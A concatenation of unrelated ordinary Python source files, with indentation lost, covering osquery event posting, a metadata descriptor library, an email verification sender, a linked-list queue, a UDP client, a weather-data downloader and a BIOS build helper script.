def _post_events_from_osquery_log(msn, user_agent, ip, event_cls, records):
for record in records:
for k in ("decorations", "numerics", "calendarTime", "hostIdentifier"):
if k in record:
del record[k]
event_cls.post_machine_request_payloads(msn, user_agent, ip, records, _get_osquery_log_record_created_at)
def post_results(msn, user_agent, ip, results):
_post_events_from_osquery_log(msn, user_agent, ip, OsqueryResultEvent, results)
def post_status_logs(msn, user_agent, ip, logs):
_post_events_from_osquery_log(msn, user_agent, ip, OsqueryStatusEvent, logs)
# Utility function for the audit trail
def post_osquery_pack_update_events(request, pack_data, pack_queries_data):
event_request = EventRequest.build_from_request(request)
pack_update_event_metadata = EventMetadata(OsqueryPackUpdateEvent.event_type, request=event_request)
pack_update_event = OsqueryPackUpdateEvent(pack_update_event_metadata, pack_data)
pack_update_event.post()
for idx, pack_query_data in enumerate(pack_queries_data):
pack_query_update_event_metadata = EventMetadata(OsqueryPackQueryUpdateEvent.event_type, request=event_request,
uuid=pack_update_event_metadata.uuid, index=idx + 1)
pack_query_update_event = OsqueryPackQueryUpdateEvent(pack_query_update_event_metadata, pack_query_data)
pack_query_update_event.post()
|
import re
import sys
from abc import ABCMeta
from copy import copy as _copy, deepcopy
import logging
import typing as t
from types import MethodType
from collections import ChainMap
from collections.abc import Mapping, Callable
from threading import RLock
from laza.common.collections import fallbackdict, orderedset
from laza.common import text
from laza.common.data import assign
from .functools import export, Void
METADATA_ATTR = '_meta'
METADATA_CLASS_ATTR = '__metadata_class__'
# _class_registry = dict()
logger = logging.getLogger('flex')
T = t.TypeVar('T')
def get_metadata_class(cls: t.Type[T], attr: str,
final_attr: t.Optional[str] = None,
base: t.Type['BaseMetadata'] = None,
mro: t.Optional[t.Tuple[t.Type, ...]] = None,
name: t.Optional[str] = None,
dct: t.Optional[t.Mapping] = None,
set_final: t.Optional[bool] = False) -> type['BaseMetadata[T]']:
rv = final_attr and getattr(cls, final_attr, None)
if not rv:
bases = tuple(_iter_base_metadata_class(attr, mro or cls.mro(), base))
rv = type(name or f'{cls.__name__}Metadata', bases, dct or {})
return rv
def _iter_base_metadata_class(attr, mro, base=None):
seen = set((None,))
for c in mro:
oc = getattr(c, attr, None)
if oc not in seen:
seen.update(oc.mro())
yield oc
base = base or BaseMetadata
if base not in seen:
yield base
__last_creation_index = 0
def _get_creation_order():
global __last_creation_index
__last_creation_index += 1
return __last_creation_index
_TF = t.TypeVar('_TF')
@export
class metafield(t.Generic[_TF]):
"""Descriptor for meta fields.
"""
__slots__ = (
'__name__', '__objclass__', '__weakref__', 'doc', 'field',
'fload', 'fget', 'fset', 'fdel', '_creation_order',
'inherit', 'default', 'lock', 'alias'
)
def __init__(self, fload=None, field=None, fget=None, fset=None, fdel=None,
name=None, default=None, inherit=True, doc=None, alias: t.Union[bool, str]=None):
self.fload = self.fget = self.fset = self.fdel = None
self.__name__ = name
self.__objclass__ = None
self.alias = alias
self.doc = doc
if isinstance(fload, str):
assert field is None
self.field = fload
fload = None
else:
self.field = field
self.loader(fload)
self.getter(fget)
self.setter(fset)
self.deletter(fdel)
self.default = default
self.inherit = inherit
self.lock = RLock()
self._creation_order = _get_creation_order()
@property
def __doc__(self):
return self.doc
def __repr__(self):
attrs = ', '.join(f'{k}={getattr(self, k)!r}' for k in (
'field', 'alias', 'inherit'
))
return f"{self.__class__.__name__}({self.__name__!r}, {attrs})"
def __getstate__(self):
return { k: getattr(self, k) for k in (
'__name__', 'doc', 'field',
'fload', 'fget', 'fset', 'fdel',
'inherit', 'default', 'alias'
)}
def __setstate__(self, state):
keys = {'__name__', 'doc', 'field',
'fload', 'fget', 'fset', 'fdel',
'inherit', 'default', 'alias'}
for k in state.keys() & keys:
setattr(self, k, state[k])
self.__objclass__ = None
self._creation_order = _get_creation_order()
self.lock = RLock()
def loader(self, func):
if func is None or callable(func):
old = self.fload
self.fload = func
if self.doc is None or (old is not None and self.doc == old.__doc__):
self.doc = None if func is None else func.__doc__
if self.__name__ is None or (old is not None and self.__name__ == old.__name__):
self.__name__ = None if func is None else func.__name__
else:
raise TypeError('expected callable, got %s.' % type(func))
def getter(self, func):
if func is None or callable(func):
self.fget = func
return self
raise TypeError('Expected callable or None. Got %s.' % type(func))
def setter(self, func):
if func is None or callable(func):
self.fset = func
return self
raise TypeError('Expected callable or None. Got %s.' % type(func))
def deletter(self, func):
if func is None or callable(func):
self.fdel = func
return self
raise TypeError('Expected callable or None. Got %s.' % type(func))
def contribute_to_class(self, owner, name=None):
assert (name is None or self.__name__ is None) or self.__name__ == name, (
f'attribute __name__ must be set to bind {type(self)}'
)
if self.__objclass__:
assert issubclass(owner, self.__objclass__), (
f'can only contribute to subclasses of {self.__objclass__}. {owner} given.'
)
if name:
setattr(owner, name, self)
self.__set_name__(owner, name)
def __set_name__(self, owner, name):
if self.__objclass__ is None:
self.__objclass__ = owner
self.__name__ = name
elif self.__objclass__ is owner:
self.__name__ = name
else:
raise RuntimeError(f'__set_name__. metafield already bound.')
if not self.field:
self.field = name
if self.alias is True:
if self.field == name:
self.alias = False
else:
self.alias = name
elif self.alias == self.field:
self.alias = False
def __call__(self, fload: t.Callable[..., _TF]) -> 'metafield[_TF]':
assert self.fload is None, ('metafield option already has a loader.')
self.loader(fload)
return self
def __load__(self, obj) -> t.Union[_TF, t.Any]:
try:
# rv = obj.__raw__[self.field or self.__name__]
rv = obj.__raw__[self.field]
except KeyError:
if self.alias:
rv = obj.__raw__.get(self.alias, Void)
else:
rv = Void
except AttributeError:
rv = Void
try:
base = obj.__base__
except AttributeError:
base = None
if self.fload is None:
if rv is Void:
if self.inherit and base is not None:
rv = base.get(self.__name__, self.default)
else:
rv = self.default
if self.fset is not None:
self.fset(obj, rv)
rv = NotImplemented
else:
if not self.inherit or base is None:
args = ()
else:
try:
args = base[self.__name__],
except KeyError:
args = ()
rv = self.fload(obj, self.default if rv is Void else rv, *args)
if rv is not NotImplemented:
obj.__dict__[self.__name__] = rv
obj.__fieldset__.add(self.__name__)
return rv
def __get__(self, obj: 'BaseMetadata', cls) -> _TF:
if obj is None:
return self
fget = self.fget
if self.__name__ in obj.__fieldset__:
if fget is not None:
return fget(obj)
else:
try:
return obj.__dict__[self.__name__]
except KeyError:
raise AttributeError(self.__name__)
with self.lock:
rv = self.__load__(obj)
if fget is None:
if rv is NotImplemented:
raise AttributeError(self.__name__)
return rv
return fget(obj)
# return rv if self.fget is None else self.fget(obj, rv)
# return rv if self.fget is None else self.fget(obj)
def __set__(self, obj, value):
with self.lock:
if self.__name__ not in obj.__fieldset__:
self.__load__(obj)
if self.fset is not None:
# obj.__dict__[self.__name__] = self.fset(obj, value)
self.fset(obj, value)
elif self.fload is not None:
if self.inherit:
val = self.fload(obj, value, obj.__dict__.get(self.__name__))
else:
val = self.fload(obj, value)
if val is not NotImplemented:
obj.__dict__[self.__name__] = val
else:
obj.__dict__[self.__name__] = value
# obj.__fieldset__.add(self.__name__)
def __delete__(self, obj):
if self.fdel is not None:
self.fdel(obj)
obj.__dict__.pop(self.__name__, None)
obj.__fieldset__.discard(self.__name__)
if t.TYPE_CHECKING:
class metafield(metafield[_TF], property[_TF], t.Generic[_TF]):
def __get__(self, obj, cls) -> _TF:
...
class MetadataType(ABCMeta):
__fields__: orderedset
__fieldaliases__: fallbackdict
__fieldset__: orderedset[str]
def __new__(mcls, name, bases, dct):
cls = super().__new__(mcls, name, bases, dct)
cls.register_metafields()
# vardump(f'{cls.__module__}:{cls.__qualname__}', {f: getattr(cls, f) for f in cls.__fields__})
return cls
def get_class(self, target: type, attr, *, name=None):
if name is None:
name = text.uppercamel(f'{target.__name__}_{self.__name__}')
return get_metadata_class(target, attr, name=name, base=self)
def register_metafields(self):
self.__fields__= fieldset = orderedset()
self.__fieldaliases__ = aliases = fallbackdict(lambda k: k)
for name, field in self._iter_metafields():
field.contribute_to_class(self, name)
fieldset.add(name)
# field.field and fieldset.add(field.field)
if field.alias:
aliases[field.alias] = name
def _iter_metafields(self):
seen = set(self.__dict__)
for b in reversed(self.mro()[1:]):
for n in b.__fields__ if isinstance(b, MetadataType) else dir(b):
if n not in seen:
f = getattr(self, n, None)
if isinstance(f, metafield):
seen.add(n)
yield n, deepcopy(f)
for n in self.__dict__:
f = getattr(self, n)
if isinstance(f, metafield):
yield n, f
# fields = (
# (k,v) for b in self.mro()
# for k in b.__dict__
# if isinstance(v := getattr(self, k, None), metafield)
# )
# return fields
# mro.append(None)
# yield from sorted(fields, key=lambda kv: (mro.index(kv[1].__objclass__)+1, kv[1]._creation_order))
def _to_dict(obj, default=None, skip: str=r'^__'):
if obj is None:
return default
elif isinstance(obj, Mapping):
return obj
skip = skip and re.compile(skip).search
skipfn = skip and (lambda v: not skip(v)) or None
return { k: getattr(obj, k) for k in filter(skipfn, dir(obj)) }
TT = t.TypeVar('TT')
@export
class BaseMetadata(t.Generic[T], metaclass=MetadataType):
# __slots__ =(
# '__name__', '__raw__', '__base__', 'target', '__allowextra__',
# '__dict__', '__weakref__'
# )
__fields__: orderedset
__fieldaliases__: dict[str, str]
__name__: str
__allowextra__: t.ClassVar[bool] = False
__add_to_target__: t.ClassVar[bool] = True
target: t.Type[T]
def __init__(self, target = None, name=None, raw=None, base=None, *, allowextra=None):
# self.target = None
self.__fieldset__ = set()
self.__raw__ = _to_dict(raw, default=dict())
self.__base__ = _to_dict(base, skip=None)
if allowextra is not None:
self.__allowextra__ = allowextra
self.target = target
(None is target) or (None is name is base) or self.__load__(name)
@property
def __objclass__(self) -> t.Type[T]:
return self.target
@property
def _metadataloaded_(self):
return not(hasattr(self, '__raw__') or hasattr(self, '__base__'))
def __set_name__(self, owner, name):
if self.target is None:
self.target = owner
# if self.__add_to_target__: # and isinstance(owner, type):
# setattr(owner, name, self)
# name and self.__load__(name)
self.__load__(name)
else:
assert self.target is owner, (
f'{type(self)} already added to {self.target}. adding: {owner}.'
)
def __load__(self, name):
if not hasattr(self, '__raw__'):
raise RuntimeError(f'{type(self)} already loaded for {self.target}.')
if name and self.__add_to_target__:
setattr(self.target, name, self)
if self.__base__ is None and name:
self.__base__ = self._base_from_target(self.target, name)
self.__name__ = name
fieldset = self.__fieldset__
fieldset.clear()
for f in self.__fields__:
getattr(self, f, None)
if self.__allowextra__:
skip = set(dir(self)) | fieldset | self.__fields__ | self.__fieldaliases__.keys()
for k in self.__raw__.keys() - skip:
if isinstance(k, str) and k[0] != '_':
fieldset.add(k)
setattr(self, k, self.__raw__[k])
for k in self.__base__.keys() - (skip | fieldset):
if isinstance(k, str) and k[0] != '_':
fieldset.add(k)
setattr(self, k, self.__base__[k])
self.__loaded__()
del self.__raw__
del self.__base__
self.__ready__()
def __loaded__(self):
pass
def __ready__(self):
pass
def copy(self, **replace):
if not self._metadataloaded_:
raise RuntimeError(f'{self.__class__.__name__} not loaded')
rv = _copy(self)
replace and rv.__dict__.update(replace)
return rv
def __getstate__(self):
if not self._metadataloaded_:
raise RuntimeError(f'{self.__class__.__name__} not loaded')
return self.__dict__.copy()
def __setstate__(self, val):
self.__dict__.update(val)
# def __getattr__(self, alias):
# name = self.__fieldaliases__[alias]
# if name is alias:
# tb = sys.exc_info()[1]
# # return NotImplemented
# raise AttributeError(alias).with_traceback(tb)
# return getattr(self, name)
@classmethod
def _base_from_target(cls, target, attr):
if isinstance(target, type):
maps = (getattr(b, attr, None) for b in target.__bases__)
maps = (b for b in maps if isinstance(b, BaseMetadata))
return ChainMap({}, *maps)
return getattr(target.__class__, attr, {})
def get(self, key, default=None):
try:
return self[key]
except KeyError:
return default
def update(self, *args, **kwds):
assign(self, *args, kwds)
def __iter__(self):
yield from self.__dict__
def __contains__(self, key):
# return self.__fieldset__.__contains__(key) and hasattr(self, key)
return isinstance(key, str) and hasattr(self, key)
def __getitem__(self, key):
# if isinstance(key, str):
# if True or not text.is_dunder(key):
try:
return getattr(self, key)
except AttributeError:
raise KeyError()
def __setitem__(self, key, value):
setattr(self, key, value)
# def __repr__(self) -> str:
# # attrs = dict((k, self.__dict__[k]) for k in self.__dict__ if not text.is_dunder(k))
# print(self.__fieldset__)
# attrs = { k : self.get(k, ...) for k in self.__fieldset__ }
# return f'{self.__class__.__name__}({self.target.__name__}, {attrs})'
def __repr__(self) -> str:
return f'{self.__class__.__name__}({self.target})'
|
import tensorflow as tf
import time
import numpy as np
tf.compat.v1.disable_eager_execution()
def main():
from neural_compressor.experimental import Quantization, common
quantizer = Quantization('./conf.yaml')
# Do quantization
quantizer.model = common.Model('./inception_v1.ckpt')
quantized_model = quantizer.fit()
if __name__ == "__main__":
main()
|
# -*- coding:utf-8 -*-
import smtplib, email
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.image import MIMEImage
from email.mime.base import MIMEBase
from email.mime.application import MIMEApplication
from email.header import Header
import secret_key, constants, random
from datetime import datetime
def send_email(rcptto, username=secret_key.USERNAME, password=secret_key.PASSWORD, replyto=secret_key.REPLYTO, error=0):
'''发送邮件
参数:
username 表示控制台创建的发件人地址
password 表示发件人密码
replyto 表示回复地址
rcptto 表示收件人地址
input:rcptto 收件人
output:code 验证码
example:
code = utils.send_email(rcptto='653128964@qq.com')
print(code)
'''
# 生成6位验证码
code = generate_verification_code()
print("验证码是", code)
# 构建alternative结构
msg = MIMEMultipart('alternative')
msg['Subject'] = Header('验证码').encode()
msg['From'] = '%s <%s>' % (Header('闲余翻身').encode(), username)
msg['To'] = rcptto
msg['Reply-to'] = replyto
msg['Message-id'] = email.utils.make_msgid()
msg['Date'] = email.utils.formatdate()
# 构建alternative的text/html部分
html_file = open('./tools/templates/email.html','r',encoding="utf-8")
html_text = html_file.read().format(rcptto=rcptto, code=code) + '<style type="text/css">.qmbox style, .qmbox script, .qmbox head, .qmbox link, .qmbox meta {display: none !important;}</style></div></div><!-- --><style>#mailContentContainer .txt {height:auto;}</style> </div>'
texthtml = MIMEText(html_text, _subtype='html', _charset='UTF-8')
msg.attach(texthtml)
# 发送邮件
try:
client = smtplib.SMTP_SSL(host='smtp.gmail.com', timeout=5)
client.connect('smtpdm.aliyun.com', 465)
# 开启DEBUG模式
client.set_debuglevel(0)
client.login(username, password)
client.sendmail(username, rcptto, msg.as_string())
client.quit()
print('邮件发送成功!')
except Exception as e:
# if error > 4:
# return -1
print('邮件发送异常, ', str(e))
# print('重新发送中...')
# error += 1
# code = send_email(rcptto, error=error)
return -1
return code
def generate_verification_code():
'''生成6位验证码
参数:
input:None
output: code
'''
return ''.join(random.sample(constants.code_element_list, 6))
def model_repr(obj, pattern: str, orders):
''' 返回制定的样式
参数:
obj:从数据库中查询的结果
pattern:模式字符串
orders:需要的属性的顺序
'''
temp = []
for order in orders:
temp.append('"{}"'.format(order))
attr = getattr(obj, order)
if attr is None:
attr = '""'
elif isinstance(attr, (str, datetime)):
attr = '"{}"'.format(attr)
else:
attr = str(attr)
temp.append(attr)
return pattern % tuple(temp)
def make_pattern(orders_len: int):
'''用于获取指定长度的匹配字符串
参数:
orders_len: 指定属性的列表的长度
'''
if orders_len <= 0:
raise AttributeError('orders_len can not be less than 1')
pattern = r'{'
for _ in range(orders_len - 1):
pattern += '%s: %s, '
pattern += r'%s: %s}'
return pattern
|
from output.models.nist_data.atomic.unsigned_short.schema_instance.nistschema_sv_iv_atomic_unsigned_short_min_inclusive_2_xsd.nistschema_sv_iv_atomic_unsigned_short_min_inclusive_2 import NistschemaSvIvAtomicUnsignedShortMinInclusive2
__all__ = [
"NistschemaSvIvAtomicUnsignedShortMinInclusive2",
]
|
#!/usr/bin/python3
"""
A node to be used in a linked list
"""
class Node:
def __init__(self, data):
self.data = data
self.prev = None
self.next = None
"""
A class to represent the linked list queue
"""
class Linked_Queue:
def __init__(self, size):
self.size = size
self.list = []
self.head = None
self.tail = None
self.num_items = 0
"""
Enqueues the items to the array and returns if it is successful
"""
def enqueue(self, item):
if not self.is_full(): # If the list is not full, then we can add the item
node = Node(item) # We will make the new item into a node (for the linked list)
self.list.append(node) # We append the node to the list
if self.num_items == 0: # If there are no items in the list, set this as the head and tail
self.head = node
self.tail = node
self.num_items += 1
return True
elif item > self.tail.data: # If this item has a higher number than the tail (last item), then set it as the new tail
self.tail.next = node
node.prev = self.tail
self.tail = node
self.num_items += 1
return True
else:
current = self.head # Otherwise, loop through the list
while current is not None: # If the current node is None, then we are at the end of the list
if current.data > item: # If the item is less than the current node, then we should insert it before the current node
prev = current.prev
if prev is not None: # Make sure that the previous node exists
prev.next = node
else: # If it doesn't, then the new node should be the head
self.head = node
current.prev = node
node.prev = prev
node.next = current
self.num_items += 1
return True
current = current.next # Increment node
else:
return False # If the queue is full, then return false
"""
Dequeues an item from the queue and returns it, raise IndexError if the queue is empty
"""
def dequeue(self):
if not self.num_items == 0: # If the queue contains nodes, then it is possible to dequeue
node = self.head
if node.next is not None: # If the head has a next node (size is greater than 1) then set the next node to the head
next = node.next
next.prev = None
self.head = next
self.list.remove(node) # Remove the node from the list
self.num_items -= 1
return node.data # Return the node's data
else: # If the head has no next node (size is 1) then set head and tail to None, as list is now empty
self.head = None
self.tail = None
self.list.remove(node) # Remove the node from the list
self.num_items -= 1
return node.data # Return the node's data
else:
raise IndexError # If there are no items in the queue, raise an IndexError
"""
Returns whether the queue is full or not
"""
def is_full(self):
return self.num_items == self.size # If the number of items equals the size, then the queue is full
"""
Returns all the data in the form of a list of data (not nodes)
"""
def as_list(self):
py_list = [] # Initialize a list
current = self.head # Start the node at the head
while current is not None: # Loop through the existing nodes
py_list.append(current.data) # Add the current node's data to the list
current = current.next # Increment the current node to it's next node
return py_list # Return the new data list
|
import os
from datetime import datetime
A_NONE = 'None'
A_PARTIAL = 'Partial'
A_FULL = 'Full'
A_FAIL = 'Fail'
A_PASS = 'Pass'
class Scan:
'''abstract class to scan a raw data file'''
file_path = None
file_size = None
reader = None
progress = 0 # completed percentage (0 - 100)
scan_result = {}
default_info = {
'byteCount': 0,
'recordCount': 0,
'pingCount': 0,
'missedPings': 0,
'startTime': None,
'stopTime': None,
'other': None,
}
def __init__(self, file_path):
self.file_path = file_path
self.file_size = os.path.getsize(file_path)
def _time_str(self, unix_time):
'''return time string in ISO format'''
return datetime.utcfromtimestamp(unix_time)\
.isoformat(timespec='milliseconds')
def scan_datagram(self):
'''
scan data to extract basic information for each type of datagram
and save to scan_result
'''
def get_datagram_info(self, datagram_type):
'''return info about a specific type of datagrame'''
if datagram_type in self.scan_result.keys():
return self.scan_result[datagram_type]
return None
def get_total_pings(self, datagram_type=None):
'''return the nuber of pings'''
if datagram_type is not None:
if datagram_type not in self.scan_result.keys():
return 0
return self.scan_result[datagram_type]['pingCount']
total = 0
for datagram_type in self.scan_result.keys():
total += self.scan_result[datagram_type]['pingCount']
return total
def get_missed_pings(self, datagram_type=None):
'''return the nuber of missed pings'''
if datagram_type is not None:
if datagram_type not in self.scan_result.keys():
return 0
return self.scan_result[datagram_type]['missedPings']
total = 0
for datagram_type in self.scan_result.keys():
total += self.scan_result[datagram_type]['missedPings']
return total
def total_datagram_bytes(self):
'''return number of bytes of all datagrams'''
total_bytes = 0
for datagram_type in self.scan_result.keys():
total_bytes += self.scan_result[datagram_type]['byteCount']
return total_bytes
def is_size_matched(self):
'''check if number of bytes of all datagrams is equal to file size'''
return (self.total_datagram_bytes() == self.file_size)
|
import tornado.iostream
import tornado.ioloop
import tornado.concurrent
import tornado
import time
import socket
import functools
import collections
class UDPRequest(object):
def __init__(self, addr, port, data, src_port=0):
self.addr = addr
self.port = port
self.data = data
self.src_port = src_port
class _UDPConnection(object):
def __init__(self, io_loop, request, release_callback, future, max_buffer_size):
self.start_time = time.time()
self.io_loop = io_loop
self.request = request
self.release_callback = release_callback
self.future = future
addrinfo = socket.getaddrinfo(
request.addr,
request.port,
socket.AF_INET,
socket.SOCK_DGRAM,
0,
0,
)
af, socktype, proto, canonname, sockaddr = addrinfo[0]
sock = socket.socket(af, socktype, proto)
if request.src_port:
sock.bind(('0.0.0.0', request.src_port))
self.stream = tornado.iostream.IOStream(
sock,
io_loop=self.io_loop,max_buffer_size=2500,
)
self.stream.connect(sockaddr,self._on_connect)
def _on_connect(self):
self.stream.write(self.request.data)
# TODO: buf size?
self.stream.read_bytes(1024, partial=True, callback=self._on_response)
def _on_response(self,data):
if self.release_callback is not None:
release_callback = self.release_callback
self.release_callback = None
release_callback()
if self.future:
self.future.set_result(data)
self.stream.close()
class AsyncUDPClient(object):
def __init__(self, io_loop=None):
self.io_loop = io_loop or tornado.ioloop.IOLoop.instance()
self.max_clients = 10
self.queue = collections.deque()
self.active = {}
self.max_buffer_size = 2500
# TODO: timeout
def fetch(self, request, **kwargs):
future = tornado.concurrent.Future()
self.queue.append((request, future))
self._process_queue()
return future
def _process_queue(self):
with tornado.stack_context.NullContext():
while self.queue and len(self.active) < self.max_clients:
request, future = self.queue.popleft()
key = object()
self.active[key] = (request, future)
_UDPConnection(
self.io_loop,
request,
functools.partial(self._release_fetch,key),
future,
self.max_buffer_size,
)
def _release_fetch(self,key):
del self.active[key]
self._process_queue()
|
import json
import os
import uuid
import pickle
from Alerts.Alert import Alert
from AlertsParameters.Categories.Category import Category
class AlertsDiskIO(object):
def __init__(self):
super().__init__()
home = os.path.expanduser("~")
self.alertsDirectory = os.path.join(home, "EbayAlertor")
self.alertPrefix = "alert_"
self.resultPrefix = "result_"
if not os.path.exists(self.alertsDirectory):
os.makedirs(self.alertsDirectory)
def getAlertsFromDisk(self):
alerts = []
for file in os.listdir(self.alertsDirectory):
fullFilename = os.path.join(self.alertsDirectory, file)
if os.path.isfile(fullFilename) and file.startswith(self.alertPrefix):
with open(fullFilename, "r") as fd:
alert = self.__tryCreateAlertFromFile(file, fd)
if alert:
alerts.append(alert)
return alerts
def deleteAlertInDisk(self, alert):
filename = os.path.join(self.alertsDirectory, self.alertPrefix + str(alert.uid))
if os.path.exists(filename) and os.path.isfile(filename):
os.remove(filename)
def __tryCreateAlertFromFile(self, filename, fd):
uid = uuid.UUID(filename[len(self.alertPrefix):])
try:
jsonContent = json.load(fd)
except:
print("Invalid alert file format ({})".format(filename))
return None
keywords = jsonContent["keywords"]
categoriesJson = jsonContent["categories"]
location = jsonContent["location"]
sortOrder = jsonContent["sortOrder"]
categoriesList = []
for categoryJson in categoriesJson:
category = Category(categoryJson["name"],
categoryJson["id"],
categoryJson["level"])
categoriesList.append(category)
alert = Alert(keywords, categoriesList, location=location, uid=uid,
sortOrder=sortOrder)
return alert
def saveAlertToDisk(self, alert):
categoriesDict = []
for category in alert.categories:
d = {
"name": category.name,
"id": category.ID,
"level": category.level
}
categoriesDict.append(d)
dict = {
"keywords": alert.keywords,
"location": alert.location,
"categories": categoriesDict,
"location": alert.location,
"sortOrder": alert.sortOrder
}
jsonContent = json.dumps(dict)
filename = os.path.join(self.alertsDirectory, self.alertPrefix + str(alert.uid))
with open(filename, "w+") as fd:
fd.writelines(jsonContent)
|
import random
from typing import Tuple
from PIL import Image
def get_average_per_channel(img: Image) -> Tuple[float, float, float]:
r, g, b = 0, 0, 0
area = img.width * img.height
for y in range(img.height):
for x in range(img.width):
pixel = img.getpixel((x, y))
r += pixel[0]
g += pixel[1]
b += pixel[2]
if not area:
area = 1
return (r / area, g / area, b / area)
def is_square(image: Image) -> bool:
width, height = image.size
return height == width
def redim_image(img, max_dim=1500):
width, height = img.width, img.height
if not width > max_dim and not height > max_dim:
return img
if height > width:
hpercent = (max_dim / float(img.size[1]))
wsize = int((float(img.size[0]) * float(hpercent)))
res = img.resize((wsize, max_dim), Image.ANTIALIAS)
else:
wpercent = (max_dim/float(img.size[0]))
hsize = int((float(img.size[1]) * float(wpercent)))
res = img.resize((max_dim, hsize), Image.ANTIALIAS)
return res
|
# n is not required in this program
# to meet the requirements of STDIN of hackerrank we are using n variable
def soln(a, scores):
scores = sorted(list(dict.fromkeys(scores)))
print(scores[-2])
if __name__ == "__main__":
n = int(input())
arr = map(int, input().split())
soln(n, arr)
|
from future.standard_library import install_aliases
install_aliases()
from urllib.request import urlopen
import os
import logging
import sys
data_dir = os.path.join(os.path.abspath(__file__ + '/../../../..'), 'data/raw/weather_wunderground')
logger = logging.getLogger(__name__)
# include your weather stations here by country, get the METARS site code from the station.txt file.
weather_stations_MY = ('WBGB','WBGG','WBGR','WBGS','WBGY','WBKK','WBKL','WBKS','WBKT','WBKW','WMAP','WMAU','WMBA','WMBT','WMKA','WMKB','WMKC','WMKD','WMKE','WMKF','WMKI','WMKJ','WMKK','WMKL','WMKM','WMKN','WMKP','WMPA','WMSA')
weather_stations_BN = ('WBSB')
weather_stations_SG = ('WSAP','WSAT','WSSL','WSSS')
weather_stations_ID = ('WAAA','WAAB','WAAP','WAAS','WAAU','WABB','WABI','WABN','WABO','WABT','WADA','WADD','WADL','WAJI','WAJJ','WAJW','WAKK','WAKT','WAMA','WAMG','WAMH','WAMI','WAML','WAMM','WAMN','WAMP','WAMR','WAMT','WAMW','WAPA','WAPH','WAPI','WAPN','WAPP','WAPR','WARR','WARS','WARQ','WASF','WASK','WASR','WASS','WIAA','WIAG','WIAM','WIAR','WIAS','WIBB','WIDD','WIHH','WIIA','WIIB','WIID','WIIH','WIII','WIIJ','WARJ','WIIK','WIIL','WIIS','WIIT','WIKB','WIKD','WIKK','WIDN','WIKN','WIKS','WIMB','WIMG','WIMM','WIMS','WIMT','WIOI','WIOK','WION','WIOO','WIOS','WIPA','WIPH','WIPK','WIPL','WIPP','WIPR','WIPT','WITA','WITC','WITM','WITT','WRBB','WAOO','WRBI','WRBK','WRBM','WRBP','WRKA','WRKC','WRKE','WRKK','WATT','WRKL','WRKM','WRKR','WRKS','WRLB','WRLG','WRLH','WRLK','WRLL','WALL','WALR','WRLR','WRLS','WRLU','WRRA','WRRB','WRRR','WRRS','WRRW','WRSJ','WRSP','WRSQ','WRSS')
weather_stations_PH = ('RPLB','RPLC','RPLI','RPLL','RPMD','RPMK','RPML','RPMP','RPMR','RPMS','RPMZ','RPUA','RPUB','RPUD','RPUH','RPUI','RPUK','RPUM','RPUN','RPUO','RPUQ','RPUR','RPUT','RPUV','RPUW','RPVA','RPVB','RPVC','RPVD','RPVF','RPVG','RPVI','RPVJ','RPVK','RPVM','RPVP','RPVR','RPVT','RPWB','RPWC','RPWE','RPWG','RPWI','RPWJ','RPWL','RPWM','RPWP','RPWS','RPWW','RPWX','RPWY','RPWZ','RPXC','RPXT','RPMT')
WEATHER_STATIONS = {
'MY': weather_stations_MY,
'BN': weather_stations_BN,
'ID': weather_stations_ID,
'PH': weather_stations_PH
}
def download():
countries_to_download = ['PH', 'MY']
for country in countries_to_download:
for year in range(2010,2016):
# change the country you want to download meteorogical data from here
for ws in WEATHER_STATIONS[country]:
logger.info(
"Downloading wunderground data for country %s, year %s and station %s",
country, year, ws
)
url = "https://www.wunderground.com/history/airport/{0}/{1}/1/1/CustomHistory.html?dayend=31&monthend=12&yearend={2}&format=1".format(ws, year, year)
country_data_dir = "{}/{}".format(data_dir, country)
# and here in the folder name
if sys.version_info < (3, 0):
try:
os.makedirs(country_data_dir)
except OSError as e:
pass
else:
os.makedirs(country_data_dir, exist_ok=True)
filename = os.path.join(country_data_dir, "{0}-{1}.csv".format(ws,year))
# response = urllib2.urlopen(url)
response = urlopen(url)
with open(filename,'wb') as output:
output.write(response.read())
|
from __future__ import annotations
import pytest
pytest.register_assert_rewrite("tests.mixology.helpers")
|
# @ build_board.py
# This adds additional functions to the build_bios.py
#
# Copyright (c) 2019, Intel Corporation. All rights reserved.<BR>
# SPDX-License-Identifier: BSD-2-Clause-Patent
#
"""
This module serves as an additional build steps for the Mt Olympus board
"""
import os
import sys
def pre_build_ex(config, functions):
"""Additional Pre BIOS build function
:param config: The environment variables to be used in the build process
:type config: Dictionary
:param functions: A dictionary of function pointers
:type functions: Dictionary
:returns: nothing
"""
print("Info: re-generating PlatformOffset header files")
execute_script = functions.get("execute_script")
command = ["build", "-D", "MAX_SOCKET=" + config.get("MAX_SOCKET", "1"),
"-m",
os.path.join(config["PLATFORM_BOARD_PACKAGE"],
"Acpi", "BoardAcpiDxe", "Dsdt.inf"),
"-y",
config.get("PRE_BUILD_REPORT",
os.path.join(config["WORKSPACE"],
"preBuildReport.txt")),
"--log=" + config.get("PRE_BUILD_LOG",
os.path.join(config["WORKSPACE"],
"prebuild.log"))]
_, _, _, code = execute_script(command, config)
if code != 0:
print(" ".join(command))
print("Error re-generating PlatformOffset header files")
sys.exit(1)
config["AML_FILTER"] = "\"PSYS\" .MCTL\" .FIX[0-9,A-Z]\""
print("AML_FILTER= ", config.get("AML_FILTER"))
# build the command with arguments
command = ["python",
os.path.join(config["MIN_PACKAGE_TOOLS"],
"AmlGenOffset",
"AmlGenOffset.py"),
"-d", "--aml_filter", config["AML_FILTER"],
"-o", os.path.join(config["WORKSPACE_PLATFORM"],
config["PLATFORM_BOARD_PACKAGE"],
"Acpi", "BoardAcpiDxe",
"AmlOffsetTable.c"),
os.path.join(config["BUILD_X64"],
"PurleyOpenBoardPkg",
"Acpi",
"BoardAcpiDxe",
"Dsdt",
"OUTPUT",
"Dsdt", "WFPPlatform.offset.h")]
# execute the command
_, _, _, code = execute_script(command, config)
if code != 0:
print(" ".join(command))
print("Error re-generating PlatformOffset header files")
sys.exit(1)
print("GenOffset done")
return config
def build_ex(config, functions):
"""Additional BIOS build function
:param config: The environment variables to be used in
the build process
:type config: Dictionary
:param functions: A dictionary of function pointers
:type functions: Dictionary
:returns: config dictionary
:rtype: Dictionary
"""
print("build_ex")
return None
def post_build_ex(config, functions):
"""Additional Post BIOS build function
:param config: The environment variables to be used in the post
build process
:type config: Dictionary
:param functions: A dictionary of function pointers
:type functions: Dictionary
:returns: config dictionary
:rtype: Dictionary
"""
print("post_build_ex")
execute_script = functions.get("execute_script")
if not execute_script:
print("post_build_ex Error")
